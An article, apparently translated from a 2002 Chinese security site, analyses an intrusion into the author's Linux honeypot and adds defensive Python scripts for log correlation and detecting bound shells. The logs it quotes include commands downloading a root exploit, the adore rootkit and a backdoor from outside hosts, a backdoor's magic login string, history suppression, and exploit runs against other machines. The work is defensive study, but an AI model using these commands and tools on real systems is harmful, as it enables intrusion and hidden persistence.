An Intrusion Show, Analysed from Several Angles | http://www.cshu.net
An Intrusion Show, Analysed from Several Angles
www.cshu.net  2002-12-16  fog rain village

1. Background

This article is about my Linux honeypot. She sits on the network giving off a faint scent of incense, luring in worms and all sorts of passers-by. To make a honeypot attractive, some preparation is needed.

A recent mailing-list thread discussed exactly this. One poster said a friend of his had announced a honeypot's IP address on a hacker IRC channel. A group of Romanian hackers broke in, discovered it was a honeypot system with every one of their actions fully recorded, and were furious: they retaliated with a distributed denial-of-service attack so fierce that the neighbouring network was paralysed for about a month. So luring intruders takes a certain skill. Last month I described my method to a friend: create an ordinary user account with the password "user", log in on the console with that account and leave the session sitting idle, and make sure the finger service is open. The idea was that an intruder who remembers the old days, or has a soft spot for finger, would finger out a pile of user names and then walk in by guessing the simple password; with luck that would draw a clear line between the dreaded script kiddies and the rest.

I had not expected my friend's memory to be so good. A month later, without any invitation from me, he found the honeypot with practised ease and logged in with that ordinary account. He plainly knew it was a honeypot, with every action monitored and recorded, and yet he still went on to attempt local privilege escalation, install backdoors, and attack other machines from it as a zombie. If that is not a performance on stage for the audience, what is? That is where the phrase "intrusion show" comes from.

Below, let us watch and analyse the performance together. The source material is mainly the system logs collected on the log server, the command history, and the session transcripts recorded by Snort. To save space and protect privacy, some of it has been trimmed. I hope every reader takes something away from their own angle.
2. Scanning

On a Saturday afternoon Snort alerted to a SuperScan scan from 202.X.X.X, which sent an ICMP Echo packet to test whether the system was alive:

2002-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 202.X.X.X -> 10.0.0.1

At the same time, the system log recorded the port probe that followed:
              Sinbad Technical Publications Page 2 
2002-9-21 16:48 in.rlogind[1316]: connect from 210.X.X.X
2002-9-21 16:48 inetd[413]: pid 1318: exit status 1
2002-9-21 16:48 in.rshd[1318]: connect from 210.X.X.X
2002-9-21 16:48 in.fingerd[1315]: connect from 210.X.X.X
2002-9-21 16:48 in.telnetd[1313]: connect from 210.X.X.X
2002-9-21 16:48 rshd[1318]: Connection from 210.X.X.X on illegal port
2002-9-21 16:48 telnetd[1313]: ttloop: peer died: EOF
2002-9-21 16:48 inetd[413]: pid 1316: exit status 1
2002-9-21 16:48 inetd[413]: pid 1313: exit status 1
2002-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [210.X.X.X]
2002-9-21 16:48 in.fingerd[1319]: connect from 210.X.X.X
2002-9-21 16:48 in.telnetd[1320]: connect from 210.X.X.X

Note that these port connections did not come from 202.X.X.X, the address that sent the ICMP Echo, but from 210.X.X.X. Evidently my friend was going through a TCP/UDP proxy as a springboard; the proxy does not carry ICMP, so his real IP address was exposed as well.
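To make that correlation mechanical, here is an added example (not code from the original article) that applies the same reasoning to log lines: for every Snort ICMP alert it collects the TCP "connect from" sources and logins seen within a window around it, and reports any that differ from the ICMP source, since the ICMP packet bypassed the proxy while the TCP connections went through it. The log lines embedded in it are constructed to mirror the format above, with documentation-range addresses standing in for the masked 202.X.X.X and 210.X.X.X; the regexes assume the syslog layout shown in this write-up.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the layout of the logs above (203.0.113.5 plays the
# real host that sent the ICMP Echo, 198.51.100.7 plays the TCP proxy).
SAMPLE_LOG = """\
2002-9-21 16:48 snort[1852]: [1:474:1] ICMP superscan echo [Classification: Attempted Information Leak] [Priority: 2]: {ICMP} 203.0.113.5 -> 10.0.0.1
2002-9-21 16:48 in.rlogind[1316]: connect from 198.51.100.7
2002-9-21 16:48 inetd[413]: pid 1318: exit status 1
2002-9-21 16:48 in.fingerd[1315]: connect from 198.51.100.7
2002-9-21 16:48 in.telnetd[1313]: connect from 198.51.100.7
2002-9-21 16:48 sendmail[1314]: NOQUEUE: Null connection from [198.51.100.7]
2002-9-21 16:52 login: LOGIN ON 1 BY tom FROM 198.51.100.7
2002-9-21 18:30 in.telnetd[1400]: connect from 203.0.113.5
"""

# "<date> <time> <program>[<pid>]: <message>"; the pid part is optional (login: has none)
LINE_RE = re.compile(r"^(\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{2}) (\S+?)(?:\[(\d+)\])?: (.*)$")
ICMP_RE = re.compile(r"\{ICMP\} ([\d.]+) -> ([\d.]+)")
# tcp_wrappers "connect from", rshd/sendmail "connection from [addr]"
CONNECT_RE = re.compile(r"connect(?:ion)? from \[?([\d.]+)\]?", re.IGNORECASE)
LOGIN_RE = re.compile(r"LOGIN ON \S+ BY (\S+) FROM ([\d.]+)")


def parse_syslog(text):
    """Return [(timestamp, program, message)] for lines in the write-up's layout."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M")
            events.append((ts, m.group(2), m.group(4)))
    return events


def find_pivots(text, window_minutes=10):
    """For each Snort ICMP alert, report TCP sources seen within the window that
    differ from the ICMP source, plus any logins in that window."""
    events = parse_syslog(text)
    findings = []
    for ts, prog, msg in events:
        icmp = ICMP_RE.search(msg) if prog == "snort" else None
        if not icmp:
            continue
        icmp_src = icmp.group(1)
        lo = ts - timedelta(minutes=window_minutes)
        hi = ts + timedelta(minutes=window_minutes)
        tcp_srcs, logins = set(), []
        for ts2, _prog2, msg2 in events:
            if not lo <= ts2 <= hi:
                continue
            c = CONNECT_RE.search(msg2)
            if c:
                tcp_srcs.add(c.group(1))
            l = LOGIN_RE.search(msg2)
            if l:
                logins.append((l.group(1), l.group(2)))
        proxied = sorted(tcp_srcs - {icmp_src})
        if proxied:
            findings.append({"when": ts, "icmp_src": icmp_src,
                             "tcp_srcs": proxied, "logins": logins})
    return findings


if __name__ == "__main__":
    for f in find_pivots(SAMPLE_LOG):
        print(f"{f['when']:%Y-%m-%d %H:%M} ICMP from {f['icmp_src']} (candidate real host), "
              f"TCP from {', '.join(f['tcp_srcs'])} (proxy); logins: {f['logins']}")
```

Treat the ICMP source as a lead rather than proof: the address in an ICMP Echo can be spoofed, and a second scanning host could produce the same mismatch. Here the conclusion also rests on the timing and on knowing who the visitor was.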
3. Local privilege escalation attempt

He logged in with my bait account tom on the first try, as easily as walking into his own home:

2002-9-21 16:52 login: LOGIN ON 1 BY tom FROM 210.X.X.X
2002-9-21 16:52 PAM_pwdb[1321]: (login) session opened for user tom by (uid=0)

Using cat with redirection and a paste from the clipboard, he transferred a local privilege-escalation script onto the system. Note the timestamps: rummaging through the drawers first took him 4 minutes:

2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 w
2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 pwd
2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 cd ..
2002-9-21 16:52 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cd tom
2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 cat > 1.sh
2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 chmod 755 1.sh
2002-9-21 16:56 -bash: HISTORY: PID=1322 UID=500 ./1.sh
2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 ls
What happened when ./1.sh ran? Looking at the Snort SESSION recording, the system lacked the shared library the exploit needs, so it failed. Note that in the recording every typed character appears twice: that is the terminal echo, which Snort faithfully captured in both directions:

[tom@abc tom]$ ..//11..sshh
+-----------------------------------------------------------+
| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1           |
| local root exploit                                        |
|                                                           |
| Bugs found and exploit wr#tten by Wojciech Purczynski     |
| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet                |
+-----------------------------------------------------------+
Creating temporary directory
Creating anti-noexec library (capdrop.c)
Compiling anti-noexec library (capdrop.so)
Creating suid shell (sush.c)
Compiling suid shell (sush.c)
Creating shell script
Creating own sm.cf
Dropping CAP_SETUID and calling sendmail
/bin/true: error in loading shared libraries: /tmp/foo/capdrop.so: cannot open shared object file: No such file or directory
Waiting for suid shell (/tmp/sush)
[tom@abc tom]$ llss

The first attempt failed. He deleted 1.sh and left a signature, "XXXX was here". Fair enough; at least we know who it was :)

2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 rm -rf 1.sh
2002-9-21 16:58 -bash: HISTORY: PID=1322 UID=500 echo haha shi wo XXXX > haha.txt

My friend then went for a stroll around the system, apparently without finding anything of interest:

2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd /tmp
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd foo
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd ..
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls -al
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd font-unix
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 16:59 -bash: HISTORY: PID=1322 UID=500 cd fs-1
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls -al
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd home
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd ftp
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 cd /
2002-9-21 17:00 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:01 -bash: HISTORY: PID=1322 UID=500 ps -ef

4. Second local privilege escalation attempt

He pasted in another local privilege-escalation program, compiled it, and deleted it straight away?

2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cd ~tom
2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 cat > su.c
2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c
2002-9-21 17:05 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 rm -rf su.c

It turned out the compile had failed: some characters in the source had been mangled by the cat-redirect paste:

[tom@abc tom]$ ggcccc --oo ssuu ssuu..cc
su.c: unterminated character constant
He tried another way: a new file in vi, and paste into that:

2002-9-21 17:06 -bash: HISTORY: PID=1322 UID=500 vi su.c
2002-9-21 17:07 -bash: HISTORY: PID=1322 UID=500 gcc -o su su.c

That was no better; this time there were three errors. We also notice that the recorded input contains a great many ^[[A and ^[[D sequences: he was using the arrow keys to recall the "gcc -o su su.c" command he had typed a moment earlier. Lazy enough, it seems:

[tom@abc tom]$ ^[[Avi su.c^[[A^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[4@rm -rf su.c^[[A^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[D^[[Dls^[[K^[[A^[[D^[[Dgcc -o su su.c
su.c: unterminated character constant
su.c:523: unterminated string or character constant
su.c: possible real start of unterminated constant
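The two effects seen above, doubled characters from the echo and ^[[A / ^[[D sequences from the arrow keys, make a raw session capture hard to read. Here is an added example, not part of the original article, that renders such a capture into a readable transcript: on lines that begin with a shell prompt it collapses the doubled echo of typed text, and it replaces the cursor-key and erase escape sequences with named tokens. Text that bash redraws after an up-arrow history recall is left alone, because it is printed once, by the server. The sample capture is constructed from the session excerpts in this write-up; the prompt patterns and the typed-versus-redraw rule are the example's own heuristics, not anything Snort provides.

```python
import re

# Escape sequences a telnet client sends for editing keys, mapped to readable
# tokens. \x7f and \x08 are the two common backspace encodings.
ESCAPES = {
    b"\x1b[A": "<UP>", b"\x1b[B": "<DOWN>", b"\x1b[C": "<RIGHT>",
    b"\x1b[D": "<LEFT>", b"\x1b[K": "<ERASE-EOL>", b"\x7f": "<BS>", b"\x08": "<BS>",
}
TOKEN_RE = re.compile(r"(<UP>|<DOWN>|<RIGHT>|<LEFT>|<ERASE-EOL>|<BS>)")
# Prompts seen in this capture: "[user@host dir]$ " / "]# " and the exploit's "sh-2.03# ".
PROMPT_RE = re.compile(r"^(\[[^\]]*\][$#] |sh-[\d.]+# )(.*)$")
# Constructed capture built from the session excerpts above (merged directions).
SAMPLE_CAPTURE = (
    b"[tom@abc tom]$ ..//11..sshh\r\n"
    b"Creating temporary directory\r\n"
    b"[tom@abc tom]$ llss\r\n"
    b"[tom@abc tom]$ \x1b[Avi su.c\x1b[Arm -rf su.c\x1b[D\x1b[D\r\n"
    b"sh-2.03# iidd\r\n"
)


def undouble(text):
    """Collapse 'llss' -> 'ls': when both directions of the stream are merged,
    every typed byte is immediately followed by its echo."""
    out, i = [], 0
    while i < len(text):
        out.append(text[i])
        i += 2 if i + 1 < len(text) and text[i] == text[i + 1] else 1
    return "".join(out)


def decode_session(raw):
    """Turn a merged telnet capture (bytes) into a list of readable lines."""
    for seq, token in ESCAPES.items():
        raw = raw.replace(seq, token.encode())
    lines = []
    for line in raw.decode("latin-1").replace("\r\n", "\n").split("\n"):
        m = PROMPT_RE.match(line)
        if not m:
            lines.append(line)          # server output: printed once, keep as is
            continue
        prompt, rest = m.groups()
        typed, parts = True, []
        for part in TOKEN_RE.split(rest):
            if TOKEN_RE.fullmatch(part):
                parts.append(part)
                # after a history recall bash redraws the line itself (not doubled)
                typed = part not in ("<UP>", "<DOWN>")
            else:
                parts.append(undouble(part) if typed else part)
        lines.append(prompt + "".join(parts))
    return lines


if __name__ == "__main__":
    print("\n".join(decode_session(SAMPLE_CAPTURE)))
```

This is a heuristic for a merged stream, and real captures interleave the two directions imperfectly (the "lls s-a l" line later in this article is an example). When the reconstruction matters, rebuild the transcript from a packet capture by following the client-to-server and server-to-client byte streams separately instead.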
He also left a message, "damn, I'll try again when I have time", and left. Past five on a weekend afternoon, he must have had plans:

2002-9-21 17:09 -bash: HISTORY: PID=1322 UID=500 ls
2002-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 rm -rf *.c
2002-9-21 17:10 -bash: HISTORY: PID=1322 UID=500 echo kao, yihou you kong zai gao >> haha.txt
2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 w
2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 ls -al
2002-9-21 17:11 -bash: HISTORY: PID=1322 UID=500 cat .bash_history
2002-9-21 17:13 -bash: HISTORY: PID=1322 UID=500 cat /etc/passwd
2002-9-21 17:16 -bash: HISTORY: PID=1322 UID=500 exit

5. Third local privilege escalation attempt

Two days later my friend came back. It was Monday afternoon, working hours; apparently his job is not very busy. That is a common trait of the box-popping crowd: plenty of time and energy.

2002-9-23 13:28 in.telnetd[5567]: connect from 210.X.X.X
2002-9-23 13:28 PAM_pwdb[5568]: (login) session opened for user tom by (uid=0)
2002-9-23 13:28 login: LOGIN ON 1 BY tom FROM 210.X.X.X
This time he had learned his lesson and tried to download directly with wget, but my system apparently had no wget installed, or PATH was wrong. He then switched to lynx with the -dump option and succeeded in downloading, from a domestic mirror of hack.co.za, the privilege-escalation program su.c, which exploits /bin/su. Compiled and run, it finally gave him local root:

2002-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 w
2002-9-23 13:29 -bash: HISTORY: PID=5569 UID=500 ps -ef
2002-9-23 13:32 -bash: HISTORY: PID=5569 UID=500 wget http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c
2002-9-23 13:34 -bash: HISTORY: PID=5569 UID=500 lynx
2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.safechina.net/www_hack_co_za/redhat/5.1/su.c > su.c
2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 gcc -o su su.c
2002-9-23 13:35 -bash: HISTORY: PID=5569 UID=500 ./su

su exploit by XP <xp@xtreme-power.com>
Enjoy!
Phase 1. Checking paths and write permisions
Checking for /usr/bin/msgfmt.. Ok
Checking for /usr/bin/objdump.. Ok
Checking write permisions on /tmp.. Ok
Checking read permisions on /bin/su.. Ok
Checking for a valid language... [using af_ZA] Ok
Checking that /tmp/LC_MESSAGES does not exist.. Ok
Phase 2. Calculating eat and pad values
..................................................................... done
Eat = 120 and pad = 2
Phase 3. Creating evil libc.mo and setting enviroment vars
Phase 4. Getting address of dtors section of /bin/su
......................................... done
Dtors is at 0x0804bd3c
Phase 5. Compiling suid shell
/tmp/xp created Ok
Phase 6. Executing /bin/su
- Entering rootshell -
sh-2.03# iid

Snort also alerted that he had obtained root:

2002-9-23 13:37 snort[1852]: [1:498:3] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 10.0.0.1:23 -> 210.x.x.x:4560
6. Installing backdoors

Having obtained the highest privilege, my friend started downloading the adore rootkit and a backdoor program called sunxkdoor:

2002-9-23 13:39 sh: HISTORY: PID=7046 UID=0 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2002-9-23 13:47 sh: HISTORY: PID=7046 UID=0 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 1.tar

But this failed: the redirected files were all 0 bytes. Inside the shell spawned by the exploit, lynx would not work properly (the message is lynx complaining that it has no usable terminal definition to work with):

sh-2.03# lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz >> 1.tgz
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# llyynnxx --dduummpp http:h//www.sunx.org/mysoft/sunxkdoor.tarttp://www.sunx.org/mysoft/sunxkdoor.tar >> 11..ttaarr
Your terminal lacks the ability to clear the screen or position the cursor.
sh-2.03# lls s-a l -al
total 4
drwxr-xr-x   2 tom  tom  1024 Sep 22 21:43 .
drwxrwxrwt   5 root root 1024 Sep 22 21:35 ..
-rw-rw-r--   1 root root    0 Sep 22 21:43 1.tar
-rw-rw-r--   1 root root    0 Sep 22 21:37 1.tgz
-rw-rw-r--   1 root root    0 Sep 22 21:37 adore.tgz
-rwxrwxrwx   1 tom  tom   458 Sep 22 21:35 libc.mo
-rw-rw-r--   1 tom  tom   428 Sep 22 21:35 libc.po
sh-2.03# rrmm --rrff **

After several failures he exited the rootshell back to the normal terminal, where lynx worked, and downloaded telnetd.c, an exploit against the telnet daemon, saved as 1.c; the adore rootkit, saved as 1.tgz; and the sunxkdoor backdoor, saved as 2.tar:

sh-2.03# eexxiitt
exit
Phase 7. Cleaning enviroment
rm: cannot unlink `/tmp/xp': Operation not permitted

2002-9-23 14:03 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.linux-secure.net/pliki/e..lnetd/telnetd.c > 1.c
2002-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://stealth.7350.org/rootkits/adore-0.52.tgz > 1.tgz
2002-9-23 14:04 -bash: HISTORY: PID=5569 UID=500 ls -al
2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 tar zxfv 1.tgz
2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 cd adore
2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ls
2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 ./configure
2002-9-23 14:05 -bash: HISTORY: PID=5569 UID=500 make
2002-9-23 14:06 -bash: HISTORY: PID=5569 UID=500 ls
2002-9-23 14:07 -bash: HISTORY: PID=5569 UID=500 cd ..
2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 lynx -dump http://www.sunx.org/mysoft/sunxkdoor.tar > 2.tar
2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ls -al
2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 export HISTFILE=/dev/null

Note the export HISTFILE=/dev/null: that only stops bash from writing ~/.bash_history. The HISTORY records here come from the shell logging each command to syslog as it runs, so every later command still appears below regardless.

Next he set about installing the LKM backdoor sunxkdoor. That needs root, so he ran the su exploit once more for a rootshell, loaded sunxkdoor with insmod, then logged out and came back in through the backdoor, bypassing the login procedure. The backdoor appears to hook the original /bin/login: telnet to the system and type the magic string sunxkdoor at the login: prompt, and the system drops the connection by itself; telnet in again and you land directly at a root # prompt. Note also that he moved the three downloaded backdoor programs from tom's home directory into a newly created directory, TOM.

2002-9-23 14:08 -bash: HISTORY: PID=5569 UID=500 ./su
2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 pwd
2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 cd ~tom
2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 tar xfv 2.tar
2002-9-23 14:10 sh: HISTORY: PID=8570 UID=0 export HISTFILE=/dev/null
2002-9-23 14:12 sh: HISTORY: PID=8570 UID=0 cd sunxkdoor
2002-9-23 14:12 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:13 sh: HISTORY: PID=8570 UID=0 gcc -O2 -c sunxknlsh_linux_II.c
2002-9-23 14:13 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 mv sunxknlsh_linux_II.o ../sun.o
2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 cd ..
2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 w
2002-9-23 14:14 sh: HISTORY: PID=8570 UID=0 rm -rf sunxkdoor
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mkdir TOM
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 mv * TOM
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 cd TOM
2002-9-23 14:15 sh: HISTORY: PID=8570 UID=0 ls
2002-9-23 14:16 sh: HISTORY: PID=8570 UID=0 insmod
2002-9-23 14:16 sh: HISTORY: PID=8570 UID=0 whereis insmod
2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/insmod sun.o
2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 /sbin/lsmod
2002-9-23 14:17 sh: HISTORY: PID=8570 UID=0 exit
2002-9-23 14:17 -bash: HISTORY: PID=5569 UID=500 exit
2002-9-23 14:17 PAM_pwdb[5568]: (login) session closed for user tom

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: Ssuunnxkxkddooroor

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
[root@abc /]# ccdd ~~ttoomm
[root@abc tom]# llss
TOM

Next he started installing adore. The compile was missing a header file; my friend found it in the Linux kernel source tree, copied it into the adore directory, and compiled adore. After starting adore he used the ava tool to hide the TOM directory. ava reported it hidden, but ls could still see it. My friend was rather dejected; possibly the two LKMs, adore and sunxkdoor, conflict with each other.

2002-9-23 14:23 login: HISTORY: PID=8620 UID=0 cd TOM
2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 tar zxfv 1.tgz
2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 cd adore
2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 ls
2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 ./configure
2002-9-23 14:23 login: HISTORY: PID=8260 UID=0 make
2002-9-23 14:23 login: HISTORY: PID=8620 UID=0 find / -name spinlock.h
2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 cp /usr/src/linux-2.2.14/include/asm-i386/spinlock.h .
2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 make
2002-9-23 14:24 login: HISTORY: PID=8620 UID=0 ls
2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv *.o ../
2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 ls
2002-9-23 14:25 login: HISTORY: PID=8620 UID=0 mv ava ../
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 mv startadore ../
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 cd ..
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 ls
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 rm -rf adore
2002-9-23 14:26 login: HISTORY: PID=8620 UID=0 vi startadore
2002-9-23 14:29 login: HISTORY: PID=8620 UID=0 ls
2002-9-23 14:29 login: HISTORY: PID=8620 UID=0 insmod
2002-9-23 14:29 login: HISTORY: PID=8620 UID=0 ./startadore
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 mv startadore start
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h. TOM
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 ./ava h ../TOM
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 cd ..
2002-9-23 14:30 login: HISTORY: PID=8620 UID=0 ls

7. Attacking others from the springboard

With the directory hidden by adore, my friend suddenly remembered the telnetd remote overflow exploit he had downloaded. He compiled it as 1 and began experimenting, first against this machine, then against other machines on the public network. In theory a honeypot should limit the connections it initiates outward, for instance the number of simultaneous connections, so that nobody can install a distributed denial-of-service tool on it and use it to attack other machines, causing unnecessary trouble. My honeypot had no such limit, because I spend time every day watching the stories unfold inside her and know everything that goes on :)

2002-9-23 14:50 login: HISTORY: PID=8699 UID=0 ./1 -h 127.0.0.1
2002-9-23 14:50 in.telnetd[8774]: connect from 127.0.0.1
2002-9-23 14:50 telnetd[8774]: ttloop: peer died: EOF
2002-9-23 14:56 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230 -t 5
2002-9-23 14:58 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.230
2002-9-23 14:59 inetd[8783]: 2222/tcp: bind: Address already in use
2002-9-23 14:59 inetd[8783]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:10 inetd[8783]: 2222/tcp: bind: Address already in use
2002-9-23 15:10 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.96 -t 5
2002-9-23 15:10 inetd[8793]: 2222/tcp: bind: Address already in use
2002-9-23 15:10 inetd[8793]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:11 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.106 -t 5
2002-9-23 15:11 inetd[8793]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:12 inetd[8796]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:12 inetd[8796]: 2222/tcp: bind: Address already in use
2002-9-23 15:14 last message repeated 2 times
2002-9-23 15:14 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.186 -t 3
2002-9-23 15:15 inetd[8799]: 2222/tcp: bind: Address already in use
2002-9-23 15:15 inetd[8799]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:15 snort[1852]: [1:648:5] SHELLCODE x86 NOOP [Classification: Executable Code was detected] [Priority: 1]: {TCP} 211.xxx.xxx.186:23 -> 10.0.0.1:1053
2002-9-23 15:17 last message repeated 3 times
2002-9-23 15:17 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.25 -t 4
2002-9-23 15:17 inetd[8804]: extra conf for service 2222/tcp (skipped)
2002-9-23 15:17 inetd[8804]: 2222/tcp: bind: Address already in use
2002-9-23 15:18 last message repeated 4 times
2002-9-23 15:18 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2002-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.16 -t 5
2002-9-23 15:19 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.15 -t 5
2002-9-23 15:20 login: HISTORY: PID=8699 UID=0 ./1 -h 211.xxx.xxx.226 -t 4

I did not pay much attention to the results of the overflow exploit here. What I noticed was that the system produced a large number of identical log lines, all of them after ./1 was executed:

2002-9-23 15:20 inetd[8810]: 2222/tcp: bind: Address already in use

On inspection, it turned out that a root shell had been opened on port tcp/2222! This overflow program has more features than expected: besides attacking the remote target, it also binds a shell on the machine it runs from. The log lines support that reading: inetd's "extra conf for service" message is what it prints when it finds a duplicate entry for a service in its configuration, "bind: Address already in use" means something already held the port, and each burst comes from a fresh inetd process ID (8783, 8793, 8796, ...) rather than from the original inetd, PID 413, that logged the probes on the 21st. That is consistent with the exploit adding a 2222/tcp entry and starting another inetd every time it runs.
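The inspection that found the bound shell is worth making repeatable. As an added example, not from the original article, the following script lists LISTEN sockets from /proc/net/tcp (the same table netstat reads), flags root-owned listeners that are not on an expected-port list, and, when run as root on a live Linux host, maps a socket inode back to the process holding it by walking /proc/*/fd. The /proc/net/tcp excerpt embedded in it is constructed to show a root-owned listener on 2222 (0x08AE) beside inetd's telnet listener; the allow-list of expected ports is an assumption for the demonstration and would be the honeypot's own service list in practice.

```python
import os

# Constructed /proc/net/tcp excerpt: telnet (0x0017 = 23) and a root-owned
# listener on 0x08AE = 2222, plus one established connection to ignore.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 c1a2b3c4 300 0 0 2 -1
   1: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9876 1 c1a2b3c5 300 0 0 2 -1
   2: 0100007F:0017 0100007F:0419 01 00000000:00000000 00:00000000 00000000     0        0 9990 1 c1a2b3c6 20 4 0 2 -1
"""
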